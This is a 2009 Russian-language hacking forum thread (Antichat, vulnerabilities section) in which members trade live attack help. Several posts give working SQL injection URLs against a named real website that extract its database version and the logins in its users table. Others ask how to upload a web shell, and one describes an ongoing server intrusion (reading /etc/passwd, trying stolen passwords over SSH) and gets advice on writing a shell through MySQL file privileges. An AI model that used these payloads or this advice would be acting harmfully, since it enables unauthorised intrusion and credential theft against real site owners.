HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.04.2009, 21:10
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами: 10158086

Репутация: 1359


По умолчанию

Цитата:
Сообщение от neverdie  
народ, подскажьте плз как запускать скрипты например перловский niko просто я запускаю через свой компилятор и выдаёт ошибку на третьей линии просто я не могу найти админку одного сайта, юзал телепорт про не помогло....
какая ошибка? случайно не связана с https?
если так и при этом тебя этот протокол не интересует, то нужно эту строку закомментировать или удалить.
 
Ответить с цитированием

  #2  
Старый 09.04.2009, 19:56
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

neverdie проблема не в твоем компиляторе, а ая думаю в самом скрипте..
 
Ответить с цитированием

  #3  
Старый 09.04.2009, 20:57
VITАL
Познающий
Регистрация: 19.08.2008
Сообщений: 33
С нами: 9330638

Репутация: 93
По умолчанию

Цитата:
http://www.photodom.com/catalog.php?page=2&id=17,117)+union+select+1%23&pa ge025=&action=
нету вывода чтоли? пятая ветка..
 
Ответить с цитированием

  #4  
Старый 09.04.2009, 21:05
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

Цитата:
Сообщение от VITАL  
нету вывода чтоли? пятая ветка..
так

Код:
http://www.photodom.com/catalog.php?page=2&id=17,117)+and+ascii(lower(substring((SELECT+login+from+users+LIMIT+1),1,1)))%3E1%23&page025=&action=
с пасами лень искать
 
Ответить с цитированием

  #5  
Старый 09.04.2009, 21:37
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами: 9076508

Репутация: 169
По умолчанию

Цитата:
Сообщение от VITАL  
нету вывода чтоли? пятая ветка..
Код:
http://www.photodom.com/fullscreen.php?fotoid=-1291553+union+select+1,2,3,4,5,6,7,8,9,0,concat(%27%22%3E%3Ch1%3E%27,version()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3+--
 
Ответить с цитированием

  #6  
Старый 09.04.2009, 21:47
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами: 9370904

Репутация: -4
По умолчанию

Всем приятного времени суток

хочу залить на сайт шелл , а kak это сделать не знаю вообще .
мост , где то можно про это почитать или объясните на пальцах , луче наверно в личку уже тогда.
 
Ответить с цитированием

непохек=(
  #7  
Старый 09.04.2009, 22:11
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами: 9187097

Репутация: 158
Angry непохек=(

В общем такая ситуация: на сервере на многих сайтах скуль иньекции, есть доступ к нескольким админкам, шелл через них не получаеццо залить, на одном поддомене бд запущена от имени root, file_priv - Y, пороли из mysql.user есть, пробовал читать разные конфиги - не читаются, тока получается etc/passwd....shadow тоже не читается, что странно ведь бд запущена от рута. По ssh ни один из добытых пассов не подошел(. Подкиньте пожалуйста свежую идейку...
на серве есть(взял из passwd):
Secure FTP
Novell Customer Center
PostgreSQL Server
OpenLDAP
SSH
Может можно прочитать логи подключения по фтп или ssh, подкиньте стандартные пути плз..


и еще кофе заканчиваеццо(
 
Ответить с цитированием

  #8  
Старый 09.04.2009, 22:28
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от fker  
В общем такая ситуация: на сервере на многих сайтах скуль иньекции, есть доступ к нескольким админкам, шелл через них не получаеццо залить, на одном поддомене бд запущена от имени root, file_priv - Y, пороли из mysql.user есть, пробовал читать разные конфиги - не читаются, тока получается etc/passwd....shadow тоже не читается, что странно ведь бд запущена от рута. По ssh ни один из добытых пассов не подошел(. Подкиньте пожалуйста свежую идейку...
на серве есть(взял из passwd):
Secure FTP
Novell Customer Center
PostgreSQL Server
OpenLDAP
SSH
Может можно прочитать логи подключения по фтп или ssh, подкиньте стандартные пути плз..


и еще кофе заканчиваеццо(
Исчи phpmyadmin или конекться на 3306 порт-если открыт..и лей шелл где FILE PRIV Y-если ты говоришь что пароли у тебя есть...А НЕ ХЕШИ..
И почему ты думаешь что если в мускуле лазишь под логином рута ...должен читаться /etc/shadow?
 
Ответить с цитированием

  #9  
Старый 09.04.2009, 22:12
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

https://forum.antichat.ru/thread49775.html
 
Ответить с цитированием

  #10  
Старый 09.04.2009, 22:15
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами: 9187097

Репутация: 158
По умолчанию

2 Pashkela именно от туда и брал пути....там нет от Secure FTP и ССШ..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.